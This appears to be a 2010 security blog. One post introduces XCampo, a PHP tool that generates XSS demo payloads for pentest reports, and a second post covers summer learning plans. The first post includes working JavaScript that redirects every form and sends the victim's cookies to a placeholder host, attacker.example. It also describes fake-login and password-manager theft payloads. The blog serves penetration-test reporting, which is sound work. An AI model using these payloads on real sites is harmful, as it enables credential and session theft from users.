Tuesday 13 July 2010

XCampo

I'm very pleased to present you with a (more or less) usable version of XCampo!

What is XCampo? I decided to write it on the way back from the RootedCon conference in Madrid. It is intended to help me (and anyone else who wants to use it) produce better screenshots and demos for the report writing (and presentation) process.

Sometimes, when people write security reports and want to convey the risk of an XSS vulnerability, they insert a simple script that pops an alert box showing the website's name or some text. That proves we can execute arbitrary script in the victim's browser, and security people understand what it means... but do non-technical people?

Using this PHP page you get a simple form with options for generating different payloads for your demos on the fly:
  • Fake login: Generates a fake login page that tricks the user into entering their credentials.
  • hax0r defacement: Covers the whole page with a black layer carrying a message and an audio file.
  • Form redirection: Redirects every form on the website to a specified URL, so whatever the user submits (credentials included) goes to us instead of the site.
  • Password manager: Tries to steal the login details the browser has saved for a specified page, relying on the password manager auto-filling an injected login form.
  • Cookie stealing: Sends the victim's cookies to the URL we want. Note that only cookies without the HttpOnly flag are visible to script; a session cookie set with HttpOnly will not show up in this demo.
As you can see, this gives a good range of options for building more "dangerous" demos for the presentation of the results.
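To make concrete what two of these options do once the payload runs in the victim's browser, here is an added example (my own illustration, not code from XCampo) of the form-redirection and cookie-stealing payloads. The functions take the document as an explicit argument so that in a browser you pass `document`, while here a constructed stub with one login form and a sample cookie string stands in so the logic can be exercised offline. The hostnames victim.example and attacker.example, the `/collect` path and the cookie values are placeholders I made up.

```javascript
// Added example, not XCampo's own code: form redirection and cookie
// stealing as an XSS payload written against an explicit `doc` argument.
// victim.example / attacker.example and the cookie values are constructed.

function redirectForms(doc, targetUrl) {
  // Point every form on the page at the attacker's collector. The page still
  // looks like the real site, so the victim gets no visual cue that the next
  // submit leaves the origin.
  let rewritten = 0;
  for (const form of doc.forms) {
    form.setAttribute('data-original-action', form.action); // kept for the demo screenshot
    form.action = targetUrl;
    form.method = 'POST';
    rewritten += 1;
  }
  return rewritten;
}

function buildCookieBeacon(doc, collectorUrl) {
  // document.cookie only exposes cookies without the HttpOnly flag; a session
  // cookie set with HttpOnly never appears in this string.
  const beacon = new URL(collectorUrl);
  beacon.searchParams.set('c', doc.cookie);
  beacon.searchParams.set('l', doc.location.href);
  return beacon.toString();
}

function stealCookies(doc, collectorUrl) {
  // An <img> request is the classic exfil channel: a plain GET with no CORS
  // preflight, issued silently from inline script.
  const img = doc.createElement('img');
  img.src = buildCookieBeacon(doc, collectorUrl);
  return img.src;
}

// Constructed stub of the parts of `document` the payload touches, so the
// example runs outside a browser. In a real page, pass `document` instead.
function makeStubDocument() {
  const loginForm = {
    action: 'https://victim.example/login',
    method: 'GET',
    attributes: {},
    setAttribute(name, value) { this.attributes[name] = value; },
  };
  return {
    forms: [loginForm],
    cookie: 'PHPSESSID=abc123; theme=dark', // constructed sample, no HttpOnly cookie present
    location: { href: 'https://victim.example/account' },
    createElement() { return { src: '' }; },
  };
}

function runDemo() {
  const doc = makeStubDocument();
  const rewritten = redirectForms(doc, 'https://attacker.example/collect');
  const beacon = stealCookies(doc, 'https://attacker.example/collect');
  return { rewritten, form: doc.forms[0], beacon };
}

if (typeof module !== 'undefined' && require.main === module) {
  console.log(runDemo());
}
```

In a real demo the collector at attacker.example would be a one-line script that logs the query string; for the report, a screenshot of that log next to the untouched-looking login page usually lands the point better than any alert box.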

Friday 2 July 2010

Security challenges for the summer

Hello! The summer is here and the holidays are near!

Planning something to do? Too much free time as you don't have to do any exams in September? Looking for something to learn? Me too! :)

Each summer I plan something to learn, something to investigate... basically something to help me enjoy my free time! This summer I'm going to focus on:

  • Firefox addons development (Check this Hackbar Google Code website)
  • HTML5
I'll also try to keep my mind fit by playing online challenge games. If you want to practice and learn about security you can check the following websites:
Enjoy and keep out of direct sunlight ;)